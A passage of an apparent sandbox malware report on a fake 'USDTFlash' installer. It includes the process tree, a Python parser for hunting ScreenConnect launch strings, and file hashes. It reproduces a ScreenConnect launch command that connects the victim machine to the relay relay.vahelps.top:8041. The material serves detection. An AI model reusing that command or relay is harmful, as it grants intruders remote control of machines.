BNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FLASHUSDT"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies data under HKEY_USERS
                                                          PID:4708
                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                            "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "b12c0afe-1dfe-41b1-841a-d2b5a593a6d7" "User"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:788
                                                        • C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2468
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                            2⤵
                                                            • Enumerates connected drives
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2968
                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe
                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                                                          1⤵
                                                            PID:4992
                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                                                              2⤵
                                                              • Boot or Logon Autostart Execution: Active Setup
                                                              • Executes dropped EXE
                                                              • Installs/modifies Browser Helper Object
                                                              • Drops file in Program Files directory
                                                              • Drops file in Windows directory
                                                              • Modifies Internet Explorer settings
                                                              • Modifies data under HKEY_USERS
                                                              • Modifies registry class
                                                              • System policy modification
                                                              PID:4560
                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Windows directory
                                                                PID:1996
                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                • Drops file in Windows directory
                                                                • Modifies data under HKEY_USERS
                                                                PID:2188
                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  PID:2220
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                • Drops file in Windows directory
                                                                PID:3264
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  PID:2652
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Windows directory
                                                                PID:3260
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  PID:1512
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Windows directory
                                                                PID:2128
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  PID:424
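
The ScreenConnect.ClientService.exe line in the tree above is the most useful artefact in it: the client gets its whole relay configuration as a URL-style query string on the command line (h= and p= are the relay host and port, s= the session id, e=Access an unattended-access client, t= a label, k= the server's public key, v= a settings blob), so the same fields can be pulled straight out of process-creation telemetry for hunting. The Python below is an added example for this report, not code from the sandbox, the sample or ConnectWise. Its two sample command lines are constructed from the lines above with the long k= and v= blobs cut short; the relay allowlist (support.example.com) is hypothetical. Beyond the report's own case, it also decodes the k= header as a CryptoAPI PUBLICKEYBLOB and recognises the DPAPI blob header at the start of v=, so the same parser can triage any ScreenConnect launch string.

```python
"""Pull the relay configuration out of a ScreenConnect client launch command line.

Added example for this report; not code from the sandbox, the sample or
ConnectWise. The client receives a URL-style query string on its command line
(e=, y=, h=, p=, s=, k=, v=, t=), so process-creation telemetry already holds
the relay host, port, session id and the server's public key.
"""
import base64
import re
import struct
import uuid
from urllib.parse import parse_qs

# Constructed samples copied from the process tree above; the long k= (public
# key) and v= (settings) blobs are cut short to keep them readable.
SAMPLE_LAUNCH = (
    r'"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=relay.vahelps.top&p=8041'
    '&s=bb212036-9f37-46ca-99ab-ac42f37709e0'
    '&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQ'
    '&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA'
    '&t=FLASHUSDT"'
)
SAMPLE_MSI = (
    r'"C:\Windows\System32\msiexec.exe" /i '
    r'"C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"'
)

LAUNCH_ARG_RE = re.compile(r'"(\?[^"]*)"')            # the one quoted arg that starts with '?'
INSTANCE_RE = re.compile(r'ScreenConnect Client \(([0-9a-f]{16})\)')
CLIENT_MSI_RE = re.compile(                            # staged MSI path carries version + instance
    r'\\ScreenConnect\\(?P<version>\d+(?:\.\d+){3})\\(?P<instance>[0-9a-f]{16})'
    r'\\ScreenConnect\.ClientSetup\.msi', re.IGNORECASE)


def _b64(s: str) -> bytes:
    """Decode base64 that may have lost its '=' padding in the URL."""
    return base64.b64decode(s + '=' * (-len(s) % 4))


def parse_launch_string(cmdline: str) -> dict:
    """Return the launch parameters as a flat dict, or {} if there are none."""
    m = LAUNCH_ARG_RE.search(cmdline)
    if not m:
        return {}
    # parse_qs percent-decodes, so k= and v= come back as plain base64.
    qs = parse_qs(m.group(1).lstrip('?'), keep_blank_values=True)
    params = {key: values[0] for key, values in qs.items()}
    inst = INSTANCE_RE.search(cmdline)
    if inst:
        params['instance'] = inst.group(1)
    return params


def describe_public_key_blob(k_param: str) -> dict:
    """Decode the k= header as a CryptoAPI PUBLICKEYBLOB (BLOBHEADER + RSAPUBKEY)."""
    raw = _b64(k_param)
    b_type, _ver, _res, alg = struct.unpack_from('<BBHI', raw, 0)
    magic, bits, exponent = struct.unpack_from('<4sII', raw, 8)  # modulus follows, not needed
    return {'type': 'PUBLICKEYBLOB' if b_type == 0x06 else hex(b_type),
            'alg': alg,  # 0xA400 == CALG_RSA_KEYX
            'magic': magic.decode('ascii', 'replace'), 'bits': bits, 'exponent': exponent}


def dpapi_provider_guid(v_param: str):
    """Return the provider GUID if v= is a DPAPI (CryptProtectData) blob, else None."""
    raw = _b64(v_param)
    if len(raw) < 20 or struct.unpack_from('<I', raw, 0)[0] != 1:
        return None
    return str(uuid.UUID(bytes_le=raw[4:20]))


def parse_client_setup_msi(cmdline: str) -> dict:
    """Return {'version', 'instance'} from a 'msiexec /i ...ClientSetup.msi' line."""
    m = CLIENT_MSI_RE.search(cmdline)
    return m.groupdict() if m else {}


def assess(cmdline: str, allowed_relays: frozenset) -> dict:
    """Flag a ScreenConnect client whose relay host is not one the org operates.

    allowed_relays is a hypothetical list of the organisation's own relay
    hostnames; a real deployment would take it from asset inventory.
    """
    params = parse_launch_string(cmdline)
    if not params:
        return {'screenconnect': False}
    host = params.get('h', '').lower()
    allowed = any(host == a or host.endswith('.' + a) for a in allowed_relays)
    return {'screenconnect': True, 'relay': f"{host}:{params.get('p', '')}",
            'session': params.get('s'), 'instance': params.get('instance'),
            'suspicious': not allowed}


if __name__ == '__main__':
    launch = parse_launch_string(SAMPLE_LAUNCH)
    print(assess(SAMPLE_LAUNCH, frozenset({'support.example.com'})))
    print(describe_public_key_blob(launch['k']), dpapi_provider_guid(launch['v']))
    print(parse_client_setup_msi(SAMPLE_MSI))
```

Run against the tree above this yields relay.vahelps.top:8041 as the relay, a 2048-bit RSA key with exponent 65537 as the server key, and a v= value that starts with the DPAPI blob header (version 1, provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb), so v= is machine-bound ciphertext rather than a second key and cannot be read from telemetry alone. The instance id e9736d81e38965d1 ties the service line to the msiexec /i line earlier in the tree, which also gives the client version (24.3.7.9067). When reading the tags on the tree, note that the Active Setup, Browser Helper Object and system-policy hits all sit under the EdgeUpdate\Install\{…} subtree, whose paths and switches are those of the stock Microsoft Edge installer; they are more plausibly the sandbox's own Edge update than part of the sample's chain, which is why the parser above ignores that subtree.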

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Downloads

                                                          • C:\Config.Msi\e61bbee.rbs
                                                            Filesize  214KB
                                                            MD5       a4d99e18eb5d6536f91557035bc4d722
                                                            SHA1      1eda16863cd71fa37f9fd01c57acf2465854a3eb
                                                            SHA256    2bc3fd163ef2d30d9774cf6cf456f8065e85901734aad3599f2768b1b7dad6bb
                                                            SHA512    247d6eb1003ba11db1d4bb519865cbb42c222870b7438dd75c55d23b8a2db466518a581939f01f13db10f49eb78613e765e2c1775dea2edc1a6675c98c53f7f9

                                                          • C:\Config.Msi\e61bbf3.rbs
                                                            Filesize  18KB
                                                            MD5       cd2ca29b6ef7f86a48ad3f1e0ba219eb
                                                            SHA1      f383c325bd60fd01aa3565b0cb960742fba06e13
                                                            SHA256    6e3b03462855f937f87bfbf8513cf0142eac64fac23b697e0040864edf45183d
                                                            SHA512    db400f8cbff83e53b00a48ddd2a66fe2cf15c0d48676e9ab1a6a8da834fd971f36c47868e9ab1a2fc2cf279e8644e53d6556ead494e53a5e48650c01e502648e

                                                          • C:\Config.Msi\e61bc05.rbs
                                                            Filesize  214KB
                                                            MD5       50a254de7b3b707867daefe5f4ccf047
                                                            SHA1      33fecee01d584375a511e99940eecd1176c1a957
                                                            SHA256    c34f8e70fee2fdfd8771c04732556d6494e224e9eb24ebe510c130b89d9bfb23
                                                            SHA512    71e6acf6a4828cd7174ddc73f8cce6d4958baf97a0b22608d4280a95983e1c78ba9a66be0fff627c1c3772c08a1bb0dc9a80e1201a8df00121e297e52744f784

                                                          • C:\Config.Msi\e61bc07.rbs
                                                            Filesize  3KB
                                                            MD5       b3f023cccdc9a6177207b9db7a66ff32
                                                            SHA1      73a11cef1495fe9a6a7c27704576703303ed2a02
                                                            SHA256    a3927a21dd40f682e2ae097c03ebb7a0359cbd5214e1096a3ffd98b4f01b8cdc
                                                            SHA512    d6241681c98e63f1309996c70fe2c022c4079884a5ed5267f20ad2984edef1f4af5aa71c1afaa2dcb70bf03693403e5343f546f798f966cc25fcee79b8fbbb36

                                                          • C:\Config.Msi\e61bc0b.rbs
                                                            Filesize  18KB
                                                            MD5       e34190ddb4950e4a4d7511d464e810d6
                                                            SHA1      4d7c3b9af84841aaf2546b7da1f44182dca6af97
                                                            SHA256    1999a57d75eceffa77e77f65582adf164fefa9e5086795e1141cf064f99ec52d
                                                            SHA512    64f98f9abb5c15491474842a4ceac274aa71e8fa3cd783a78969e70cb6aa06f954067aae8dc12d12c3a158710c36e02d1a172c691561403946d8d8b423cc5fc1

                                                          • C:\Config.Msi\e61bc1d.rbs
                                                            Filesize  214KB
                                                            MD5       4d21c754798d330f1e780fc870787774
                                                            SHA1      8ad355e49cbcad3b79e1f4a3064b27c3732f3dc2
                                                            SHA256    147380d525349ba805f360825c93822d2eaddb1edbaaa69c54ef91f426bbf83b
                                                            SHA512    afe3cef8e693e05230b08884f49a8301524e90eea77b5b316498840c8bc8e29c2887576cd8ebe62237244b9b6f8d0d163d17697dcd59ea285e022e6f4c08a63b

                                                          • C:\Config.Msi\e61bc1f.rbs
                                                            Filesize  3KB
                                                            MD5       89dac159850c745923092c97ae9bbcd8
                                                            SHA1      26538f30332978441872b9dbe952e55aebdb0ec5
                                                            SHA256    e1da5782ab35772c1601c04c83b9947f3a47c0518242ed17e1154f230e9121ea
                                                            SHA512    2da669d2b3ac17472c9d0bd240760b0a8deb47cb1098dab5a5e039823655139ce08187cc47450e9a1debf38187fef2ecd98a106be20a77ddf82210788d21fbe6

                                                          • C:\Config.Msi\e61bc23.rbs
                                                            Filesize  18KB
                                                            MD5       4b4f009ca3bf6b1ef85edc22d8d6d36d
                                                            SHA1      15a754da0aff7a8088916873bd040260b130bf09
                                                            SHA256    5cdc1f976a01ec8311871e3a4c6de4c897bb022a7dd077aeaf007cb4f35c0914
                                                            SHA512    ff5c77d8ee1cbd44944086f2f4b4a2477853c098aa8878d1647f91180a1217d20dd14cde7a6104165612f8d2e5f5e3adfa6973397210a1541e322c6debe31f67

                                                          • C:\Config.Msi\e61bc35.rbs
                                                            Filesize  214KB
                                                            MD5       f79920d2d8e3a78f41d9d2149cec8270
                                                            SHA1      f46181dc1235657e8b5a95894e021e1fdd00994a
                                                            SHA256    c989cc33e3fd1f3bd979ee68b03580e4a25ae1779ca8eb3312a88a7fa6583cd4
                                                            SHA512    961185fbcb218ff47cf7e3db9d38066cae1b774d22e1aa88048de9840ed7aae536a57a9e5633648c08dff8e12ad7117198b2894da5b72102570cd5cf393d99db

                                                          • C:\Config.Msi\e71f62c.rbs
                                                            Filesize  18KB
                                                            MD5       c000f39d56eb350c9c66d3146d6c0375
                                                            SHA1      6cc04b0915084abe87177fc73c3d4ff1195f9643
                                                            SHA256    ee65e24be612d3bbf84b6311c751f1685f644534222edf7c5af701fbeb2410c4
                                                            SHA512    a89adafcf8a9791723b4930e521a0f7c23e9e25369d3a6738f22913e3e43f63a1a2ad2ac1c2848bbbd8f1e941f25f6eefca3b6d032dec64f748cd1724bd5288d

                                                          • C:\Config.Msi\e71f63e.rbs
                                                            Filesize  214KB
                                                            MD5       9a7128d070a655b58558b0471f51548a
                                                            SHA1      6f3f684c456c5c221d943c4675cff10e5b5871fc
                                                            SHA256    190d0def9ddf074d6d325827b0180c5aa1e7708cc342da9ab8d9e132148ca7da
                                                            SHA512    076d822b38147a3451c39264bfe154203ab46a847f7be3f1d6e045701689a0831676c49316c2c494a2e7347bd8cc0c1430856a01cb0f94a6eb749f4350457b91

                                                          • C:\Config.Msi\e71f640.rbs
                                                            Filesize  3KB
                                                            MD5       244989019b77282995f7076013469393
                                                            SHA1      dc42117b8d02a8e124493267a3dc440b8c5cef1a
                                                            SHA256    810c0dc41501065648203b4192267eefdd44f9e460df0b05a169051a57e14088
                                                            SHA512    e12197a73439d0e3b2060e9bde8cdcd995a6f56cca59e2aaaaf20c6b23df98e6d408444539a11a4d38e7dffe1d688c7a8169ec3167ceea5f34f4ba128f044acb

                                                          • C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe
                                                            Filesize  6.8MB
                                                            MD5       1b3e9c59f9c7a134ec630ada1eb76a39
                                                            SHA1      a7e831d392e99f3d37847dcc561dd2e017065439
                                                            SHA256    ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae
                                                            SHA512    c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\Client.en-US.resources
                                                            Filesize  48KB
                                                            MD5       d524e8e6fd04b097f0401b2b668db303
                                                            SHA1      9486f89ce4968e03f6dcd082aa2e4c05aef46fcc
                                                            SHA256    07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
                                                            SHA512    e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\Client.resources
                                                            Filesize  26KB
                                                            MD5       5cd580b22da0c33ec6730b10a6c74932
                                                            SHA1      0b6bded7936178d80841b289769c6ff0c8eead2d
                                                            SHA256    de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
                                                            SHA512    c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.Client.dll

                                                            Filesize

                                                            192KB

                                                            MD5

                                                            3724f06f3422f4e42b41e23acb39b152

                                                            SHA1

                                                            1220987627782d3c3397d4abf01ac3777999e01c

                                                            SHA256

                                                            ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f

                                                            SHA512

                                                            509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.dll

                                                            Filesize

                                                            66KB

                                                            MD5

                                                            5db908c12d6e768081bced0e165e36f8

                                                            SHA1

                                                            f2d3160f15cfd0989091249a61132a369e44dea4

                                                            SHA256

                                                            fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

                                                            SHA512

                                                            8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe

                                                            Filesize

                                                            93KB

                                                            MD5

                                                            75b21d04c69128a7230a0998086b61aa

                                                            SHA1

                                                            244bd68a722cfe41d1f515f5e40c3742be2b3d1d

                                                            SHA256

                                                            f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

                                                            SHA512

                                                            8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                            Filesize

                                                            254KB

                                                            MD5

                                                            5adcb5ae1a1690be69fd22bdf3c2db60

                                                            SHA1

                                                            09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                                                            SHA256

                                                            a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                                                            SHA512

                                                            812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsBackstageShell.exe

                                                            Filesize

                                                            59KB

                                                            MD5

                                                            afa97caf20f3608799e670e9d6253247

                                                            SHA1

                                                            7e410fde0ca1350aa68ef478e48274888688f8ee

                                                            SHA256

                                                            e25f32ba3fa32fd0ddd99eb65b26835e30829b5e4b58573690aa717e093a5d8f

                                                            SHA512

                                                            fe0b378651783ef4add3851e12291c82edccde1dbd1fa0b76d7a2c2dcd181e013b9361bbdae4dae946c0d45fb4bf6f75dc027f217326893c906e47041e3039b0

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe

                                                            Filesize

                                                            588KB

                                                            MD5

                                                            1778204a8c3bc2b8e5e4194edbaf7135

                                                            SHA1

                                                            0203b65e92d2d1200dd695fe4c334955befbddd3

                                                            SHA256

                                                            600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31

                                                            SHA512

                                                            a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe.config

                                                            Filesize

                                                            266B

                                                            MD5

                                                            728175e20ffbceb46760bb5e1112f38b

                                                            SHA1

                                                            2421add1f3c9c5ed9c80b339881d08ab10b340e3

                                                            SHA256

                                                            87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

                                                            SHA512

                                                            fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsCredentialProvider.dll

                                                            Filesize

                                                            822KB

                                                            MD5

                                                            be74ab7a848a2450a06de33d3026f59e

                                                            SHA1

                                                            21568dcb44df019f9faf049d6676a829323c601e

                                                            SHA256

                                                            7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

                                                            SHA512

                                                            2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsFileManager.exe

                                                            Filesize

                                                            79KB

                                                            MD5

                                                            1aee526dc110e24d1399affccd452ab3

                                                            SHA1

                                                            04db0e8772933bc57364615d0d104dc2550bd064

                                                            SHA256

                                                            ebd04a4540d6e76776bd58deea627345d0f8fba2c04cc65be5e979a8a67a62a1

                                                            SHA512

                                                            482a8ee35d53be907be39dbd6c46d1f45656046baca95630d1f07ac90a66f0e61d41f940fb166677ac4d5a48cf66c28e76d89912aed3d673a80737732e863851

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\app.config

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            b155ef2eb7c49f5d401d9ac84f781f34

                                                            SHA1

                                                            7de31144110631b5e80e73f01f247c1625164b78

                                                            SHA256

                                                            9aad8e47d0105531e07b1cf65719ae49e080e686c2e1e220e9efc009c411bf92

                                                            SHA512

                                                            95b7afc2b676fa23375de3e1e0ea44325539b754e53d63048381015fabad6881fbb2e729d8a3c078fd38a6024d3a079d8466d7435c9f5bc39ae5df4c2722bc2d

                                                          • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\system.config

                                                            Filesize

                                                            955B

                                                            MD5

                                                            07a92ed722d2d0152bd8d8e2aaec0ad0

                                                            SHA1

                                                            025133f5dfe9615722a67eed5785c84fc741f1ef

                                                            SHA256

                                                            f89beb98979ae11ea99f9de1ccc525c8c50d8e4337a58beab030b0268437f4dc

                                                            SHA512

